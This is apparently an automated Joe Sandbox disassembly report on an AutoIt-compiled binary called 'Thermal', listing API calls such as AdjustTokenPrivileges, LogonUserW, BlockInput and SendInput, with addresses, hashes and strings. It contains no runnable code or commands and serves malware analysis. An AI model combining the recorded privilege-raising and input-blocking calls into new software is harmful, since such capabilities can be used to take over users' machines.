                                                • Instruction ID: 75993a0a0cca3978998a533dc3406ad855c03f9f3956ae3f91e7a9b9d9233be1
                                                • Opcode Fuzzy Hash: 7558d95bef27a403ab5894ae06de8d8a8909b468b74b5e63015dc1895a70cd27
                                                • Instruction Fuzzy Hash: 90412971605249FFEB20DE56DC85EBB73BCEB44314F10806AFA01A3142E6799E429B60
                                                APIs
                                                  • Part of subcall function 00790FE6: std::exception::exception.LIBCMT ref: 0079101C
                                                  • Part of subcall function 00790FE6: __CxxThrowException@8.LIBCMT ref: 00791031
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007C93E3
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007C9410
                                                • GetLastError.KERNEL32 ref: 007C941D
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                • String ID:
                                                • API String ID: 1922334811-0
                                                APIs
                                                • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007D4271
                                                • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 007D42B2
                                                • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007D42BD
                                                Similarity
                                                • API ID: CloseControlCreateDeviceFileHandle
                                                • String ID:
                                                • API String ID: 33631002-0
                                                APIs
                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 007D4F45
                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007D4F5C
                                                • FreeSid.ADVAPI32(?), ref: 007D4F6C
                                                Similarity
                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                • String ID:
                                                • API String ID: 3429775523-0
                                                APIs
                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 007D1B01
                                                • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 007D1B14
                                                Similarity
                                                • API ID: InputSendkeybd_event
                                                • String ID:
                                                • API String ID: 3536248340-0
                                                APIs
                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,007E9B52,?,0080098C,?), ref: 007DA6DA
                                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,007E9B52,?,0080098C,?), ref: 007DA6EC
                                                Similarity
                                                • API ID: ErrorFormatLastMessage
                                                • String ID:
                                                • API String ID: 3479602957-0
                                                APIs
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007C8F27), ref: 007C8DFE
                                                • CloseHandle.KERNEL32(?,?,007C8F27), ref: 007C8E10
                                                Similarity
                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                • String ID:
                                                • API String ID: 81990902-0
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00798F87,?,?,?,00000001), ref: 0079A38A
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0079A393
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                APIs
                                                • BlockInput.USER32(00000001), ref: 007E45F0
                                                Similarity
                                                • API ID: BlockInput
                                                • String ID:
                                                • API String ID: 3456056419-0
                                                APIs
                                                • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 007D5205
                                                Similarity
                                                • API ID: mouse_event
                                                • String ID:
                                                • API String ID: 2434400541-0
                                                APIs
                                                • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,007C8FA7), ref: 007C9389
                                                Similarity
                                                • API ID: LogonUser
                                                • String ID:
                                                • API String ID: 1244722697-0
                                                APIs
                                                • GetUserNameW.ADVAPI32(?,?), ref: 007B0734
                                                Similarity
                                                • API ID: NameUser
                                                • String ID:
                                                • API String ID: 2645101109-0
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0079A35A
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                APIs
                                                • CharUpperBuffW.USER32(?,?,00800980), ref: 007F3C65
                                                • IsWindowVisible.USER32(?), ref: 007F3C89
                                                Similarity
                                                • API ID: BuffCharUpperVisibleWindow
                                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                • API String ID: 4105515805-45149045
                                                APIs
                                                • SetTextColor.GDI32(?,00000000), ref: 007FAC55
                                                • GetSysColorBrush.USER32(0000000F), ref: 007FAC86
                                                • GetSysColor.USER32(0000000F), ref: 007FAC92
                                                • SetBkColor.GDI32(?,000000FF), ref: 007FACAC
                                                • SelectObject.GDI32(?,?), ref: 007FACBB
                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 007FACE6
                                                • GetSysColor.USER32(00000010), ref: 007FACEE
                                                • CreateSolidBrush.GDI32(00000000), ref: 007FACF5
                                                • FrameRect.USER32(?,?,00000000), ref: 007FAD04
                                                • DeleteObject.GDI32(00000000), ref: 007FAD0B
                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 007FAD56
                                                • FillRect.USER32(?,?,?), ref: 007FAD88
                                                • GetWindowLongW.USER32(?,000000F0), ref: 007FADB3
                                                  • Part of subcall function 007FAF18: GetSysColor.USER32(00000012), ref: 007FAF51
                                                  • Part of subcall function 007FAF18: SetTextColor.GDI32(?,?), ref: 007FAF55
                                                  • Part of subcall function 007FAF18: GetSysColorBrush.USER32(0000000F), ref: 007FAF6B
                                                  • Part of subcall function 007FAF18: GetSysColor.USER32(0000000F), ref: 007FAF76
                                                  • Part of subcall function 007FAF18: GetSysColor.USER32(00000011), ref: 007FAF93
                                                  • Part of subcall function 007FAF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007FAFA1
                                                  • Part of subcall function 007FAF18: SelectObject.GDI32(?,00000000), ref: 007FAFB2
                                                  • Part of subcall function 007FAF18: SetBkColor.GDI32(?,00000000), ref: 007FAFBB
                                                  • Part of subcall function 007FAF18: SelectObject.GDI32(?,?), ref: 007FAFC8
                                                  • Part of subcall function 007FAF18: InflateRect.USER32(?,000000FF,000000FF), ref: 007FAFE7
                                                  • Part of subcall function 007FAF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007FAFFE
                                                  • Part of subcall function 007FAF18: GetWindowLongW.USER32(00000000,000000F0), ref: 007FB013
                                                Similarity
                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                • String ID:
                                                • API String ID: 4124339563-0
                                                • Opcode ID: 98648c516fc197bc27652eee594032c7e95fcc7fe10917f5b8c8c542fb7a63c1
                                                • Instruction ID: 3afa7246bf0925d89c1d4f4405aaacd94b5464896a880cd05eb47fdad10e3d75
                                                • Opcode Fuzzy Hash: 98648c516fc197bc27652eee594032c7e95fcc7fe10917f5b8c8c542fb7a63c1
                                                • Instruction Fuzzy Hash: B7A19CB2108305BFD7519F64DC08F6B7BA9FF89321F104A19FA66A62A0DB35D840CF52
                                                APIs
                                                • DestroyWindow.USER32(?,?,?), ref: 00773072
                                                • DeleteObject.GDI32(00000000), ref: 007730B8
                                                • DeleteObject.GDI32(00000000), ref: 007730C3
                                                • DestroyIcon.USER32(00000000,?,?,?), ref: 007730CE
                                                • DestroyWindow.USER32(00000000,?,?,?), ref: 007730D9
                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 007AC77C
                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 007AC7B5
                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 007ACBDE
                                                  • Part of subcall function 00771F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00772412,?,00000000,?,?,?,?,00771AA7,00000000,?), ref: 00771F76
                                                • SendMessageW.USER32(?,00001053), ref: 007ACC1B
                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 007ACC32
                                                • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 007ACC48
                                                • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 007ACC53
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                • String ID: 0
                                                • API String ID: 464785882-4108050209
                                                • Opcode ID: e9fc2afe383de359004fa94b203dcc368dfaa3442aeaeb0b28a0092753cd29ac
                                                • Instruction ID: 01b7eca69ebe358a92e30a1d1e9670ec3d3142089a264d3e7a43c3b75dbdbbec
                                                • Opcode Fuzzy Hash: e9fc2afe383de359004fa94b203dcc368dfaa3442aeaeb0b28a0092753cd29ac
                                                • Instruction Fuzzy Hash: EF12BE30604201EFDB26CF24C888BA9B7E5BF85351F148669F599CB262C739EC41DF91
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                • API String ID: 2660009612-1645009161
                                                • Opcode ID: 8d3493788777352d6d8d75704fe2fb5fe39fa04c5339d0fe459bfb0a0d8719fb
                                                • Instruction ID: 46902a686d92d510bd23c217a7e3a9aaacc05262f513c6a7f65adad707297684
                                                • Opcode Fuzzy Hash: 8d3493788777352d6d8d75704fe2fb5fe39fa04c5339d0fe459bfb0a0d8719fb
                                                • Instruction Fuzzy Hash: 9FA18130A40209EBCF14BF61DC5AFAE7BA9BF44740F140029F815AB293DB79AE52D750
                                                APIs
                                                • DestroyWindow.USER32(00000000), ref: 007E7BC8
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007E7C87
                                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007E7CC5
                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 007E7CD7
                                                • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 007E7D1D
                                                • GetClientRect.USER32(00000000,?), ref: 007E7D29
                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 007E7D6D
                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007E7D7C
                                                • GetStockObject.GDI32(00000011), ref: 007E7D8C
                                                • SelectObject.GDI32(00000000,00000000), ref: 007E7D90
                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 007E7DA0
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007E7DA9
                                                • DeleteDC.GDI32(00000000), ref: 007E7DB2
                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007E7DDE
                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 007E7DF5
                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 007E7E30
                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 007E7E44
                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 007E7E55
                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 007E7E85
                                                • GetStockObject.GDI32(00000011), ref: 007E7E90
                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007E7E9B
                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 007E7EA5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                • API String ID: 2910397461-517079104
                                                • Opcode ID: d6cd6d7f201a3e9e171238e307c8d9c1ab47e2364961f8476ff3c13709932ffc
                                                • Instruction ID: 3a27dc35a54d5857f23e8ed853d287538a8ffecad4e79cde47925006b2cf279a
                                                • Opcode Fuzzy Hash: d6cd6d7f201a3e9e171238e307c8d9c1ab47e2364961f8476ff3c13709932ffc
                                                • Instruction Fuzzy Hash: 61A160B1A40619BFEB14DB64DC4AFAB7BA9FB49710F108114FA15A72E0D774AD01CF60
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 007DB361
                                                • GetDriveTypeW.KERNEL32(?,00802C4C,?,\\.\,00800980), ref: 007DB43E
                                                • SetErrorMode.KERNEL32(00000000,00802C4C,?,\\.\,00800980), ref: 007DB59C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ErrorMode$DriveType
                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                • API String ID: 2907320926-4222207086
                                                • Opcode ID: 29fd4358f09b3cc4327ac38874297f03396e445e5df2a3ae9a655ab4a845e485
                                                • Instruction ID: 9d3311a6e13bc5688d634cfa4ece6a80152fb1ea55635362f525f53d9d9bbd5f
                                                • Opcode Fuzzy Hash: 29fd4358f09b3cc4327ac38874297f03396e445e5df2a3ae9a655ab4a845e485
                                                • Instruction Fuzzy Hash: 2E519E30B41209EBCB00EB20E946A7C77B0FB44740B29812BE457E7391DB7DAE91DB51
                                                APIs
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 007FA0F7
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 007FA1B0
                                                • SendMessageW.USER32(?,00001102,00000002,?), ref: 007FA1CC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window
                                                • String ID: 0
                                                • API String ID: 2326795674-4108050209
                                                • Opcode ID: ee10aa6eff08bc650dccec53541340480ec0ae065ea03ab690bfc14f3bd9c219
                                                • Instruction ID: 74d32c4cb40b7e08b6db649f2ab123151ece79ebf392fbf15db768c01846b4f8
                                                • Opcode Fuzzy Hash: ee10aa6eff08bc650dccec53541340480ec0ae065ea03ab690bfc14f3bd9c219
                                                • Instruction Fuzzy Hash: E202DDB0208309BFDB258F18C848BBABBE5FF85314F048519FA99963A1C779D854CF52
                                                APIs
                                                • GetSysColor.USER32(00000012), ref: 007FAF51
                                                • SetTextColor.GDI32(?,?), ref: 007FAF55
                                                • GetSysColorBrush.USER32(0000000F), ref: 007FAF6B
                                                • GetSysColor.USER32(0000000F), ref: 007FAF76
                                                • CreateSolidBrush.GDI32(?), ref: 007FAF7B
                                                • GetSysColor.USER32(00000011), ref: 007FAF93
                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 007FAFA1
                                                • SelectObject.GDI32(?,00000000), ref: 007FAFB2
                                                • SetBkColor.GDI32(?,00000000), ref: 007FAFBB
                                                • SelectObject.GDI32(?,?), ref: 007FAFC8
                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 007FAFE7
                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007FAFFE
                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 007FB013
                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007FB05F
                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 007FB086
                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 007FB0A4
                                                • DrawFocusRect.USER32(?,?), ref: 007FB0AF
                                                • GetSysColor.USER32(00000011), ref: 007FB0BD
                                                • SetTextColor.GDI32(?,00000000), ref: 007FB0C5
                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 007FB0D9
                                                • SelectObject.GDI32(?,007FAC1F), ref: 007FB0F0
                                                • DeleteObject.GDI32(?), ref: 007FB0FB
                                                • SelectObject.GDI32(?,?), ref: 007FB101
                                                • DeleteObject.GDI32(?), ref: 007FB106
                                                • SetTextColor.GDI32(?,?), ref: 007FB10C
                                                • SetBkColor.GDI32(?,?), ref: 007FB116
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                • String ID:
                                                • API String ID: 1996641542-0
                                                • Opcode ID: 3c855a49b143b52922688a8ca828c2b0e1df2d4eb72d2c0d3074e70b03182f3e
                                                • Instruction ID: 068eceda4e139ba0be278ec22319813f044f32e7f50658ccf04db38146e02f37
                                                • Opcode Fuzzy Hash: 3c855a49b143b52922688a8ca828c2b0e1df2d4eb72d2c0d3074e70b03182f3e
                                                • Instruction Fuzzy Hash: 286119B2900218BFDF519FA4DC49BAE7BB9FF08320F118115FA25AB2A1D7759940DF90
                                                APIs
                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 007F90EA
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007F90FB
                                                • CharNextW.USER32(0000014E), ref: 007F912A
                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 007F916B
                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 007F9181
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007F9192
                                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 007F91AF
                                                • SetWindowTextW.USER32(?,0000014E), ref: 007F91FB
                                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 007F9211
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 007F9242
                                                • _memset.LIBCMT ref: 007F9267
                                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 007F92B0
                                                • _memset.LIBCMT ref: 007F930F
                                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 007F9339
                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 007F9391
                                                • SendMessageW.USER32(?,0000133D,?,?), ref: 007F943E
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 007F9460
                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007F94AA
                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007F94D7
                                                • DrawMenuBar.USER32(?), ref: 007F94E6
                                                • SetWindowTextW.USER32(?,0000014E), ref: 007F950E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                • String ID: 0
                                                • API String ID: 1073566785-4108050209
                                                • Opcode ID: 21fd06fcf30b8bccaa0bc434e3a151b7c40bcc391a6bc9976734850662319f51
                                                • Instruction ID: b9de3bba4fa48923ac7dc955c68711a4440d92c5b453433cb0f9e3d098c11be9
                                                • Opcode Fuzzy Hash: 21fd06fcf30b8bccaa0bc434e3a151b7c40bcc391a6bc9976734850662319f51
                                                • Instruction Fuzzy Hash: BCE15A7090020DAADB219F54CC88FFE7BB9FF05710F108156FB25AA291DB798A91DF61
                                                APIs
                                                • GetCursorPos.USER32(?), ref: 007F5007
                                                • GetDesktopWindow.USER32 ref: 007F501C
                                                • GetWindowRect.USER32(00000000), ref: 007F5023
                                                • GetWindowLongW.USER32(?,000000F0), ref: 007F5085
                                                • DestroyWindow.USER32(?), ref: 007F50B1
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007F50DA
                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007F50F8
                                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 007F511E
                                                • SendMessageW.USER32(?,00000421,?,?), ref: 007F5133
                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 007F5146
                                                • IsWindowVisible.USER32(?), ref: 007F5166
                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 007F5181
                                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 007F5195
                                                • GetWindowRect.USER32(?,?), ref: 007F51AD
                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 007F51D3
                                                • GetMonitorInfoW.USER32(00000000,?), ref: 007F51ED
                                                • CopyRect.USER32(?,?), ref: 007F5204
                                                • SendMessageW.USER32(?,00000412,00000000), ref: 007F526F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                • String ID: ($0$tooltips_class32
                                                • API String ID: 698492251-4156429822
                                                • Opcode ID: 368b0f64481d3bfb2f7b8d37bc182d7a729f0e4d920c14906bf57358c725b0fe
                                                • Instruction ID: ae4903aeca466d14be7b750bbfa4767647a2608b341c6fbd59a8d1339862a98a
                                                • Opcode Fuzzy Hash: 368b0f64481d3bfb2f7b8d37bc182d7a729f0e4d920c14906bf57358c725b0fe
                                                • Instruction Fuzzy Hash: D7B16A71604744AFDB44DF64C849B6ABBE5FF88310F008A1CF6999B291DB75EC05CB92
                                                APIs
                                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 007D499C
                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 007D49C2
                                                • _wcscpy.LIBCMT ref: 007D49F0
                                                • _wcscmp.LIBCMT ref: 007D49FB
                                                • _wcscat.LIBCMT ref: 007D4A11
                                                • _wcsstr.LIBCMT ref: 007D4A1C
                                                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 007D4A38
                                                • _wcscat.LIBCMT ref: 007D4A81
                                                • _wcscat.LIBCMT ref: 007D4A88
                                                • _wcsncpy.LIBCMT ref: 007D4AB3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
